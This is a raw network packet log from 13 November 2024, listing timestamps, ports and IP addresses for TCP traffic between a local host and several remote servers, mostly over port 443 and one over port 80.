Nov 13, 2024 20:39:43.576317072 CET	443	49888	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.577384949 CET	49888	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.577426910 CET	443	49888	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.577848911 CET	49888	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.577862024 CET	443	49888	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.588336945 CET	443	49884	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:43.588408947 CET	49884	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:43.590347052 CET	443	49887	2.23.209.176	192.168.2.5
Nov 13, 2024 20:39:43.590428114 CET	49887	443	192.168.2.5	2.23.209.176
Nov 13, 2024 20:39:43.590603113 CET	49884	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:43.590626001 CET	443	49884	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:43.590871096 CET	443	49884	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:43.593226910 CET	49884	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:43.593393087 CET	49884	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:43.593404055 CET	443	49884	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:43.593540907 CET	49884	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:43.635327101 CET	443	49884	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:43.682621956 CET	49895	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:43.682657957 CET	443	49895	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:43.682919979 CET	49895	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:43.683017015 CET	49896	443	192.168.2.5	172.64.41.3
Nov 13, 2024 20:39:43.683063030 CET	443	49896	172.64.41.3	192.168.2.5
Nov 13, 2024 20:39:43.683175087 CET	49896	443	192.168.2.5	172.64.41.3
Nov 13, 2024 20:39:43.683341026 CET	49895	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:43.683356047 CET	443	49895	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:43.684036970 CET	49896	443	192.168.2.5	172.64.41.3
Nov 13, 2024 20:39:43.684053898 CET	443	49896	172.64.41.3	192.168.2.5
Nov 13, 2024 20:39:43.707137108 CET	49897	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:43.707175970 CET	443	49897	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:43.707247019 CET	49897	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:43.707866907 CET	49897	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:43.707884073 CET	443	49897	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:43.708693981 CET	443	49888	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.708919048 CET	443	49888	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.708971977 CET	49888	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.708982944 CET	443	49888	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.709274054 CET	49888	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.709369898 CET	49888	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.709398031 CET	443	49888	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.709425926 CET	49888	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.709439993 CET	443	49888	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.712699890 CET	49898	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.712716103 CET	443	49898	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.712801933 CET	49898	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.712994099 CET	49898	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.713005066 CET	443	49898	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.830553055 CET	443	49890	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.831135988 CET	49890	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.831202030 CET	443	49890	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.831646919 CET	49890	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.831662893 CET	443	49890	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.834697008 CET	443	49889	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.836118937 CET	49889	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.836134911 CET	443	49889	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.836528063 CET	49889	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.836532116 CET	443	49889	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.842961073 CET	443	49884	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:43.843398094 CET	49884	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:43.843409061 CET	443	49884	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:43.843508005 CET	49884	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:43.874968052 CET	443	49891	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.877099037 CET	49891	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.877127886 CET	443	49891	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.877640963 CET	49891	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.877649069 CET	443	49891	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.934598923 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:43.934659004 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:43.960886002 CET	443	49894	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.963509083 CET	443	49889	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.963572025 CET	443	49889	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.963769913 CET	49889	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.965622902 CET	49894	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.965643883 CET	443	49894	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.967519999 CET	49894	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.967526913 CET	443	49894	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.976169109 CET	49889	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.976169109 CET	49889	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.976191044 CET	443	49889	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.976206064 CET	443	49889	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.989345074 CET	49899	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.989434958 CET	443	49899	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:43.989520073 CET	49899	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.989684105 CET	49899	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:43.989713907 CET	443	49899	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.007201910 CET	443	49891	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.007273912 CET	443	49891	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.007364988 CET	49891	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.021388054 CET	49891	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.021389008 CET	49891	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.021419048 CET	443	49891	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.021442890 CET	443	49891	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.029098034 CET	49900	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.029144049 CET	443	49900	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.029367924 CET	49900	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.033586025 CET	49900	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.033601999 CET	443	49900	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.046808958 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.046828985 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.046890974 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.047255039 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.047266006 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.092556953 CET	443	49894	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.092684984 CET	443	49894	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.092741013 CET	443	49894	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.092797041 CET	49894	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.092797041 CET	49894	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.092946053 CET	49894	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.092962980 CET	443	49894	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.092972994 CET	49894	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.092978001 CET	443	49894	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.101681948 CET	49902	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.101716042 CET	443	49902	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.103193045 CET	49902	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.103193045 CET	49902	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.103230953 CET	443	49902	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.162436962 CET	443	49890	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.162517071 CET	443	49890	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.162750006 CET	49890	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.162832975 CET	49890	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.162832975 CET	49890	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.162878990 CET	443	49890	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.162909031 CET	443	49890	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.165602922 CET	49903	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.165622950 CET	443	49903	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.165689945 CET	49903	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.165973902 CET	49903	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.165985107 CET	443	49903	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.316675901 CET	443	49896	172.64.41.3	192.168.2.5
Nov 13, 2024 20:39:44.316924095 CET	49896	443	192.168.2.5	172.64.41.3
Nov 13, 2024 20:39:44.316955090 CET	443	49896	172.64.41.3	192.168.2.5
Nov 13, 2024 20:39:44.316957951 CET	443	49897	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:44.317147970 CET	49897	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:44.317161083 CET	443	49897	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:44.318594933 CET	443	49897	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:44.318660975 CET	49897	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:44.318701982 CET	443	49896	172.64.41.3	192.168.2.5
Nov 13, 2024 20:39:44.318761110 CET	49896	443	192.168.2.5	172.64.41.3
Nov 13, 2024 20:39:44.320302010 CET	49896	443	192.168.2.5	172.64.41.3
Nov 13, 2024 20:39:44.320389032 CET	443	49896	172.64.41.3	192.168.2.5
Nov 13, 2024 20:39:44.320544004 CET	49896	443	192.168.2.5	172.64.41.3
Nov 13, 2024 20:39:44.320553064 CET	443	49896	172.64.41.3	192.168.2.5
Nov 13, 2024 20:39:44.321166039 CET	49897	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:44.321257114 CET	443	49897	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:44.321348906 CET	49897	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:44.326471090 CET	443	49895	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:44.326680899 CET	49895	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:44.326719999 CET	443	49895	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:44.328099966 CET	443	49895	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:44.328161955 CET	49895	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:44.329668999 CET	49895	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:44.329715967 CET	443	49895	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:44.329813004 CET	49895	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:44.363337994 CET	443	49897	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:44.371325970 CET	443	49895	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:44.374253988 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.374310970 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.374423981 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.375523090 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.375539064 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.453561068 CET	443	49897	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:44.453922033 CET	49897	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:44.454253912 CET	49897	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:44.454272985 CET	443	49897	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:44.455727100 CET	443	49896	172.64.41.3	192.168.2.5
Nov 13, 2024 20:39:44.456048012 CET	49896	443	192.168.2.5	172.64.41.3
Nov 13, 2024 20:39:44.456651926 CET	49896	443	192.168.2.5	172.64.41.3
Nov 13, 2024 20:39:44.456671000 CET	443	49896	172.64.41.3	192.168.2.5
Nov 13, 2024 20:39:44.463407993 CET	443	49898	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.465174913 CET	443	49895	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:44.465272903 CET	49895	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:44.465585947 CET	49895	443	192.168.2.5	162.159.61.3
Nov 13, 2024 20:39:44.465612888 CET	443	49895	162.159.61.3	192.168.2.5
Nov 13, 2024 20:39:44.489831924 CET	49898	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.489880085 CET	443	49898	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.490313053 CET	49898	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.490319967 CET	443	49898	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.617199898 CET	443	49898	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.617296934 CET	443	49898	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.617369890 CET	49898	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.759327888 CET	49898	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.759360075 CET	443	49898	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.778414011 CET	443	49899	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.779629946 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.781717062 CET	443	49900	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.811389923 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.811407089 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.814428091 CET	49899	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.814455986 CET	443	49899	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.814714909 CET	49900	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.814716101 CET	49900	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.814738035 CET	443	49900	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.814748049 CET	443	49900	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.814790964 CET	49899	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.814795971 CET	443	49899	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.815073013 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.815155029 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.816585064 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.816689968 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.816788912 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.816796064 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.817980051 CET	49905	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.818022013 CET	443	49905	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.818213940 CET	49905	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.818387032 CET	49905	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.818396091 CET	443	49905	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.822016001 CET	443	49902	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.822885990 CET	49902	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.822901011 CET	443	49902	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.823335886 CET	49902	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.823339939 CET	443	49902	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.898533106 CET	443	49903	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.900983095 CET	49903	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.901000023 CET	443	49903	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.902353048 CET	49903	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.902357101 CET	443	49903	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.945147038 CET	443	49900	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.945229053 CET	443	49900	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.945329905 CET	49900	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.946156979 CET	443	49899	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.946516991 CET	443	49899	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.946937084 CET	49899	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.948676109 CET	443	49902	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.948717117 CET	443	49902	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.948781967 CET	443	49902	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.948832035 CET	49902	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.976547003 CET	49900	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.976547003 CET	49900	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.976572037 CET	443	49900	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.976583958 CET	443	49900	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.976594925 CET	49899	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.976594925 CET	49899	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.976645947 CET	443	49899	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.976675034 CET	443	49899	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.977817059 CET	49902	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.977817059 CET	49902	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.977826118 CET	443	49902	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.977834940 CET	443	49902	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.984059095 CET	49906	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.984112024 CET	443	49906	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.984208107 CET	49906	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.987436056 CET	49906	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.987448931 CET	443	49906	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.989583969 CET	49907	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.989639044 CET	443	49907	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.989705086 CET	49907	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.989887953 CET	49907	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.989896059 CET	443	49907	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.996797085 CET	49908	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.996823072 CET	443	49908	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:44.997060061 CET	49908	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.997268915 CET	49908	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:44.997281075 CET	443	49908	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.023376942 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.023464918 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.036873102 CET	443	49903	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.037081957 CET	443	49903	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.037133932 CET	49903	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.038214922 CET	49903	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.038224936 CET	443	49903	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.038245916 CET	49903	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.038249969 CET	443	49903	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.063545942 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.063571930 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.063596964 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.063625097 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.063632965 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.063677073 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.063705921 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.086620092 CET	49909	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.086654902 CET	443	49909	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.086791992 CET	49909	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.087739944 CET	49909	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.087757111 CET	443	49909	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.095879078 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.096203089 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.096224070 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.097667933 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.097739935 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.098077059 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.098162889 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.098280907 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.098290920 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.173387051 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.180682898 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.180749893 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.180766106 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.180778027 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.180823088 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.180852890 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.219078064 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.223903894 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.297657967 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.297719955 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.297739983 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.297754049 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.297776937 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.297792912 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.339206934 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.339241982 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.339252949 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.339273930 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.339283943 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.339287043 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.339296103 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.339310884 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.339324951 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.339340925 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.339356899 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.414841890 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.414875031 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.414916992 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.414933920 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.414952993 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.414975882 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.415684938 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.415754080 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.415760040 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.415801048 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.415874958 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.416431904 CET	49901	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.416443110 CET	443	49901	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.454719067 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.454788923 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.454811096 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.454868078 CET	443	49904	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:45.454915047 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.454915047 CET	49904	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:45.498730898 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.498742104 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.498758078 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.498775959 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.498790026 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.498796940 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.498800993 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.498814106 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.498825073 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.498836040 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.498847008 CET	80	49873	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:45.498852968 CET	49873	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:45.498862028 CET	80	49873	185.215.113.206	192.168.2.5
